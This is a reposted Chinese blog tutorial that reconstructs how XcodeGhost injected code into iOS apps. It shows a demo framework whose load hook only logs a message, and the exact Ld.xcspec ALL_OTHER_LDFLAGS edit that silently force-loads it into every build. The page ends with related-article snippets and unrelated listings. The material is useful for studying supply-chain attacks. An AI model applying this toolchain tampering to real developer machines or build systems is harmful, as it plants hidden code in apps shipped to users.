如何制造一个XcodeGhost ?

最新推荐文章于 2015-11-05 18:14:11 发布
最新推荐文章于 2015-11-05 18:14:11 发布
阅读量608 收藏
点赞数
分类专栏: 各种安全问题

原文地址:http://ibcker.me/how-to-make-a-xcodeghost/

前奏

这两天已经被这货刷屏了,大家都在讨论影响却无人提及原理。我斗胆出来写下实现过程,让大伙有个深入了解,以后也能更好的防范

分析过程

开始写这篇博客时,已经有各公司的分析过好几遍了,例如乌云的文章,加上昨天源码也已经开源,功能上神秘的面纱基本揭开。但是问题在于作者只开源功能代码,并没提及注入原理,也就是这个代码是如何被注入到你写的APP里的~

寻找受感染的Xcode

由于鄙人比较倒霉,花了真真两天也没找到,这归功于百度网盘,把所有xcode的分享全取消分享了,加上作者也在清理犯罪证据,所以···

不过好在最后还是弄到了一份,可以继续了···

首先用有问题Xcode建立了个Demo。为了验证Demo是否编译后会被注入后门,我打算用比较简单点的办法,打个断点··· 阅读源码后发现发部分逻辑是在UIWindow的category里写的,例如这个方法明显UIWindow里没有:

-(void)Check{
    if ([self Debugger]) {
        return;
    }
    if ([UIApplication sharedApplication].applicationState!=UIApplicationStateActive)
        return;
    NSInteger timestamp = [[NSDate date] timeIntervalSince1970];
    ...   
}

所以下断点 breakpoint

运行,果然断下来了 breakpoint-2

所以表明这个Xcode确实有问题,并且category名也和源码里的完全吻合。所以可以入手这篇博客的主题了-如何制造一个XcodeGhost

开工

制造一个XcodeGhost的关键点其实是如何写一个Framework并在编译时链接进去。

所以问题主要只有两个:
1.写一个framework 
2.编译时如何链接

问题1有很多现成的教程,在此简单过一下就好

1.新建工程,选动态库,起个名字并保存

new_project_1new_project_1_1

2.新建个UIWindow的category,写入hook代码
@implementation UIWindow (hook)
+ (void)load
{
      NSLog(@"hello,This is a XcodeGhost test");
}
@end

把framework改为静态类型 framework_type

2.编译后得到目标framework

res

注意选择对应要测试的目标设备(真机还是模拟器,测试阶段为了简单就不合并了)

问题一解决,把写好的framework放到Demo工程里测试,结果OK(记得先加上-ObjC 的flag) demo_log

问题二比较棘手,由于不熟悉Xcode的内部结构,不太清楚如果定位修改那里会导致编译时自动链接自己写的gohst,不过好久好在有一个有问题的Xcode,尝试看下编译日记,发现了如下线索 log_trace

然后grep整个xcode目录去寻找CoreService,在

/Applications/Xcode.app/Contents/PlugIns/Xcode3Core.ideplugin/Contents/SharedSupport/Developer/Library/Xcode/Plug-ins/CoreBuildTasks.xcplugin/Contents/Resources/Ld.xcspec

中定位到

inject

接下来就是替换尝试了,紧跟后面加上

-force_load $(PLATFORM_DEVELOPER_SDK_DIR)/Library/Frameworks/MyXcodeGhost.framework/MyXcodeGhost

并把MyXcodeGhost.framework拷贝到

/Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/Library/Frameworks/MyXcodeGhost.framework

重启Xcode后run,结果成功完成了注入~~ demo_log

根据Ld.xcspec的这个ALL_OTHER_LDFLAGS配置项的字面意思应该不难理解,这项控制的应该和咱们平时用的Ohter Linker Flags差不多,只不过这个相当于默认配置,一般用户无感知,隐藏性更好,也就更加危险。

{   
    Name = ALL_OTHER_LDFLAGS;
    Type = StringList;
    DefaultValue = "$(LD_FLAGS) $(SECTORDER_FLAGS) $(OTHER_LDFLAGS) $(OTHER_LDFLAGS_$(variant)) $(OTHER_LDFLAGS_$(arch)) $(OTHER_LDFLAGS_$(variant)_$(arch)) $(PRODUCT_SPECIFIC_LDFLAGS) -force_load $(PLATFORM_DEVELOPER_SDK_DIR)/Library/Frameworks/MyXcodeGhost.framework/MyXcodeGhost";
    CommandLinePrefixFlag = "";
}

本文重在探索学习,请勿滥用~

感谢XcodeGhost给我们所有人上了一课!尼玛,城里人真会玩!

Man_OC
关注
专栏目录
hello-xcodeghost:一个漏洞demo
05-05
Hello XcodeGhost说明本代码只做漏洞学习交流之用,切勿用作非法用途,如利用此代码违反我国法律法规,产生的一切后果自行负责。##解决方案升级iOS系统到9.0+下载App特征云检测工具 比如:盘古 ()更新检测出的有漏洞的...
探秘XcodeGhost:一场开发者的意外实验
gitblog_00041的博客
05-12 296
探秘XcodeGhost:一场开发者的意外实验 项目地址:https://gitcode.com/XcodeGhostSource/XcodeGhost 1. 项目介绍 XcodeGhost,这个名字可能让一些iOS开发者记忆犹新。这并不是一个恶意软件的代名词,而是源自一位开发者进行的一次探索性实验。它的出现曾经引起了轩然大波,但其实质是一个无害的代码片段,旨在研究如何通过修改Xcode编译配置来...
XCodeGhost
不积跬步 无以至千里 不积小流 无以成江海
11-05 401
  XCodeGhost源码: https://github.com/XcodeGhostSource/XcodeGhost   XCodeGhost攻击原理: 从传统的利用应用漏洞攻击转为利用编程语言灵活性及开发工具配置修改的攻击,攻击手法隐蔽,攻击代码逆向分析非常具有迷惑性。 #本次攻击不是利用某个应用的漏洞进行攻击,而是修改XCode软件的加载动态库配置文件(具体哪个文件不介...
【网络安全】XCodeGhost事件刨根问底
Walter的专栏
09-24 3907
喜欢安全,热爱安全,投身安全,贡献安全。一个一脚门里一脚门外的安全人对此次攻击事件的理解。 XCodeGhost事件还原 9月14日CNCERT发布了一个安全公告,警告非官方的若干版本的Xcode程序包(苹果系统的软件开发包)被做了恶意的修改被并故意大范围散发诱导使用,经由这个Xcode开发包编译的苹果系统程序会被植入恶意代码。已知有数百个应用程序受影响,包括微信 (6.2.5),滴滴出行(4
XcodeGhost代码
10-29
为了检测iPhone设备上是否运行了被XcodeGhost感染的应用,可以编写一个Demo应用,检查设备上的应用是否存在异常行为。这通常包括以下步骤: 1. **分析网络通信**:XcodeGhost会与远程服务器通信,发送设备信息或...
XcodeGhost:“ XcodeGhost”源
05-07
XcodeGhost源于我自己的实验,没有任何威胁性行为,详情见源代码:所谓的XcodeGhost实际是苦逼iOS开发者的一次意外发现:修改Xcode编译配置文本可以加载指定的代码文件,于是我写下上述附件中的代码去尝试,并上传到...
XcodeGhost_server:XcodeGhost_server
05-03
XcodeGhost_server XcodeGhost_server是XcodeGhost的服务器程序。 您可以使用它来接收加密信息,并向易受攻击的iPhone发送一些命令。依靠web.py sudo pip install web.py pyDes sudo pip install pyDes用法启动...
智慧旅游景区解决方案PPT(50页).pptx
09-21
智慧旅游解决方案利用云计算、物联网和移动互联网技术,通过便携终端设备,实现对旅游资源、经济、活动和旅游者信息的智能感知和发布。这种技术的应用旨在提升游客在旅游各个环节的体验,使他们能够轻松获取信息、规划行程、预订票务和安排食宿。智慧旅游平台为旅游管理部门、企业和游客提供服务,包括政策发布、行政管理、景区安全、游客流量统计分析、投诉反馈等。此外,平台还提供广告促销、库存信息、景点介绍、电子门票、社交互动等功能。 智慧旅游的建设规划得到了国家政策的支持,如《国家中长期科技发展规划纲要》和国务院的《关于加快发展旅游业的意见》,这些政策强调了旅游信息服务平台的建设和信息化服务的重要性。随着技术的成熟和政策环境的优化,智慧旅游的时机已经到来。 智慧旅游平台采用SaaS、PaaS和IaaS等云服务模式,提供简化的软件开发、测试和部署环境,实现资源的按需配置和快速部署。这些服务模式支持旅游企业、消费者和管理部门开发高性能、高可扩展的应用服务。平台还整合了旅游信息资源,提供了丰富的旅游产品创意平台和统一的旅游综合信息库。 智慧旅游融合应用面向游客和景区景点主管机构,提供无线城市门户、智能导游、智能门票及优惠券、景区综合安防、车辆及停车场管理等服务。这些应用通过物联网和云计算技术,实现了旅游服务的智能化、个性化和协同化,提高了旅游服务的自由度和信息共享的动态性。 智慧旅游的发展标志着旅游信息化建设的智能化和应用多样化趋势,多种技术和应用交叉渗透至旅游行业的各个方面,预示着全面的智慧旅游时代已经到来。智慧旅游不仅提升了游客的旅游体验,也为旅游管理和服务提供了高效的技术支持。
智慧旅游实景三维智慧景区建设方案PPT(70页).pptx
09-21
智慧旅游解决方案利用云计算、物联网和移动互联网技术,通过便携终端设备,实现对旅游资源、经济、活动和旅游者信息的智能感知和发布。这种技术的应用旨在提升游客在旅游各个环节的体验,使他们能够轻松获取信息、规划行程、预订票务和安排食宿。智慧旅游平台为旅游管理部门、企业和游客提供服务,包括政策发布、行政管理、景区安全、游客流量统计分析、投诉反馈等。此外,平台还提供广告促销、库存信息、景点介绍、电子门票、社交互动等功能。 智慧旅游的建设规划得到了国家政策的支持,如《国家中长期科技发展规划纲要》和国务院的《关于加快发展旅游业的意见》,这些政策强调了旅游信息服务平台的建设和信息化服务的重要性。随着技术的成熟和政策环境的优化,智慧旅游的时机已经到来。 智慧旅游平台采用SaaS、PaaS和IaaS等云服务模式,提供简化的软件开发、测试和部署环境,实现资源的按需配置和快速部署。这些服务模式支持旅游企业、消费者和管理部门开发高性能、高可扩展的应用服务。平台还整合了旅游信息资源,提供了丰富的旅游产品创意平台和统一的旅游综合信息库。 智慧旅游融合应用面向游客和景区景点主管机构,提供无线城市门户、智能导游、智能门票及优惠券、景区综合安防、车辆及停车场管理等服务。这些应用通过物联网和云计算技术,实现了旅游服务的智能化、个性化和协同化,提高了旅游服务的自由度和信息共享的动态性。 智慧旅游的发展标志着旅游信息化建设的智能化和应用多样化趋势,多种技术和应用交叉渗透至旅游行业的各个方面,预示着全面的智慧旅游时代已经到来。智慧旅游不仅提升了游客的旅游体验,也为旅游管理和服务提供了高效的技术支持。
基于深度学习实现的半监督学习例子.zip
09-21
深度学习是机器学习的一个子领域,它基于人工神经网络的研究,特别是利用多层次的神经网络来进行学习和模式识别。深度学习模型能够学习数据的高层次特征,这些特征对于图像和语音识别、自然语言处理、医学图像分析等应用至关重要。以下是深度学习的一些关键概念和组成部分: 1. **神经网络(Neural Networks)**:深度学习的基础是人工神经网络,它是由多个层组成的网络结构,包括输入层、隐藏层和输出层。每个层由多个神经元组成,神经元之间通过权重连接。 2. **前馈神经网络(Feedforward Neural Networks)**:这是最常见的神经网络类型,信息从输入层流向隐藏层,最终到达输出层。 3. **卷积神经网络(Convolutional Neural Networks, CNNs)**:这种网络特别适合处理具有网格结构的数据,如图像。它们使用卷积层来提取图像的特征。 4. **循环神经网络(Recurrent Neural Networks, RNNs)**:这种网络能够处理序列数据,如时间序列或自然语言,因为它们具有记忆功能,能够捕捉数据中的时间依赖性。 5. **长短期记忆网络(Long Short-Term Memory, LSTM)**:LSTM 是一种特殊的 RNN,它能够学习长期依赖关系,非常适合复杂的序列预测任务。 6. **生成对抗网络(Generative Adversarial Networks, GANs)**:由两个网络组成,一个生成器和一个判别器,它们相互竞争,生成器生成数据,判别器评估数据的真实性。 7. **深度学习框架**:如 TensorFlow、Keras、PyTorch 等,这些框架提供了构建、训练和部署深度学习模型的工具和库。 8. **激活函数(Activation Functions)**:如 ReLU、Sigmoid、Tanh 等,它们在神经网络中用于添加非线性,使得网络能够学习复杂的函数。 9. **损失函数(Loss Functions)**:用于评估模型的预测与真实值之间的差异,常见的损失函数包括均方误差(MSE)、交叉熵(Cross-Entropy)等。 10. **优化算法(Optimization Algorithms)**:如梯度下降(Gradient Descent)、随机梯度下降(SGD)、Adam 等,用于更新网络权重,以最小化损失函数。 11. **正则化(Regularization)**:技术如 Dropout、L1/L2 正则化等,用于防止模型过拟合。 12. **迁移学习(Transfer Learning)**:利用在一个任务上训练好的模型来提高另一个相关任务的性能。 深度学习在许多领域都取得了显著的成就,但它也面临着一些挑战,如对大量数据的依赖、模型的解释性差、计算资源消耗大等。研究人员正在不断探索新的方法来解决这些问题。
关于APx测试耳机音频的参数设置及步骤 关于APx测试耳机音频的参数设置及步骤
09-21
关于APx测试耳机音频的参数设置及步骤 关于APx测试耳机音频的参数设置及步骤
jQuery背景可滑动的导航菜单代码,鼠标经过导航时导航背景可滑动,兼容主流浏览器
09-21
jQuery背景可滑动的导航菜单代码,鼠标经过导航时导航背景可滑动,兼容主流浏览器 使用方法: 1、引入reset.css、index.css、jquery-1.7.2.min.js库文件,及jquery.movebg.js插件 2、在文件中加入<!-- 代码 开始 --><!-- 代码 结束 -->区域代码 3、移动的滑动可根据需要自由修改外观
Matlab实验指导书.doc
09-21
Matlab实验指导书.doc
S7-1200 计数器介绍
09-21
PLC
010编辑器,好用的二进制编辑器
09-21
010编辑器,好用的二进制编辑器
制作表彰奖状-使用电子表格批处理数据.pptx
09-21
信息技术教学ppt
智能翻译官cpc-bd07-20752777288491826.exe
最新发布
09-21
‌智能翻译官获得了广泛的好评‌,这主要得益于其高效、准确以及用户友好的特性。以下是一些具体的评价细节: ‌用户界面和操作体验‌:智能翻译官提供了一个直观且易于使用的界面,使得用户能够轻松地进行翻译操作。无论是文字输入、拍照翻译还是语音输入,智能翻译官都能提供流畅的使用体验,大大提高了用户的工作和沟通效率‌12。 ‌翻译准确性和速度‌:智能翻译官在翻译准确性和速度方面表现出色。它支持多种语言的翻译,包括但不限于英语、日语、韩语等,并且能够在短时间内完成翻译,确保了沟通的实时性和有效性‌23。 ‌功能多样性‌:除了基本的翻译功能外,智能翻译官还提供了同声传译、录音文件保存、实景AR翻译等多种功能。这些功能使得智能翻译官成为开会、旅行等多种场景下的理想选择‌2。 ‌用户反馈‌:从用户反馈来看,智能翻译官不仅受到了普通用户的欢迎,也得到了专业人士的认可。无论是学生、商务人士还是旅游者,都对其表示满意,认为它极大地便利了他们的学习和生活‌12。 综上所述,智能翻译官以其高效、准确、用户友好的特点,赢得了广泛的好评和推荐。无论是对于需要频繁进行语言沟通的用户,还是对于需要学习不同语言的学
基于深度学习的自动相册分类系统.zip
09-21
深度学习是机器学习的一个子领域,它基于人工神经网络的研究,特别是利用多层次的神经网络来进行学习和模式识别。深度学习模型能够学习数据的高层次特征,这些特征对于图像和语音识别、自然语言处理、医学图像分析等应用至关重要。以下是深度学习的一些关键概念和组成部分: 1. **神经网络(Neural Networks)**:深度学习的基础是人工神经网络,它是由多个层组成的网络结构,包括输入层、隐藏层和输出层。每个层由多个神经元组成,神经元之间通过权重连接。 2. **前馈神经网络(Feedforward Neural Networks)**:这是最常见的神经网络类型,信息从输入层流向隐藏层,最终到达输出层。 3. **卷积神经网络(Convolutional Neural Networks, CNNs)**:这种网络特别适合处理具有网格结构的数据,如图像。它们使用卷积层来提取图像的特征。 4. **循环神经网络(Recurrent Neural Networks, RNNs)**:这种网络能够处理序列数据,如时间序列或自然语言,因为它们具有记忆功能,能够捕捉数据中的时间依赖性。 5. **长短期记忆网络(Long Short-Term Memory, LSTM)**:LSTM 是一种特殊的 RNN,它能够学习长期依赖关系,非常适合复杂的序列预测任务。 6. **生成对抗网络(Generative Adversarial Networks, GANs)**:由两个网络组成,一个生成器和一个判别器,它们相互竞争,生成器生成数据,判别器评估数据的真实性。 7. **深度学习框架**:如 TensorFlow、Keras、PyTorch 等,这些框架提供了构建、训练和部署深度学习模型的工具和库。 8. **激活函数(Activation Functions)**:如 ReLU、Sigmoid、Tanh 等,它们在神经网络中用于添加非线性,使得网络能够学习复杂的函数。 9. **损失函数(Loss Functions)**:用于评估模型的预测与真实值之间的差异,常见的损失函数包括均方误差(MSE)、交叉熵(Cross-Entropy)等。 10. **优化算法(Optimization Algorithms)**:如梯度下降(Gradient Descent)、随机梯度下降(SGD)、Adam 等,用于更新网络权重,以最小化损失函数。 11. **正则化(Regularization)**:技术如 Dropout、L1/L2 正则化等,用于防止模型过拟合。 12. **迁移学习(Transfer Learning)**:利用在一个任务上训练好的模型来提高另一个相关任务的性能。 深度学习在许多领域都取得了显著的成就,但它也面临着一些挑战,如对大量数据的依赖、模型的解释性差、计算资源消耗大等。研究人员正在不断探索新的方法来解决这些问题。
XCodeGhost事件:苹果开发者遭遇的安全挑战
阿里移动安全团队对此进行了深入分析,并在乌云知识库发布了首篇公开的技术分析文章,将该恶意软件命名为XcodeGhost,这个名字来源于团队成员的感叹:“这事真是见鬼了”。XcodeGhost的主要危害包括收集用户设备的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值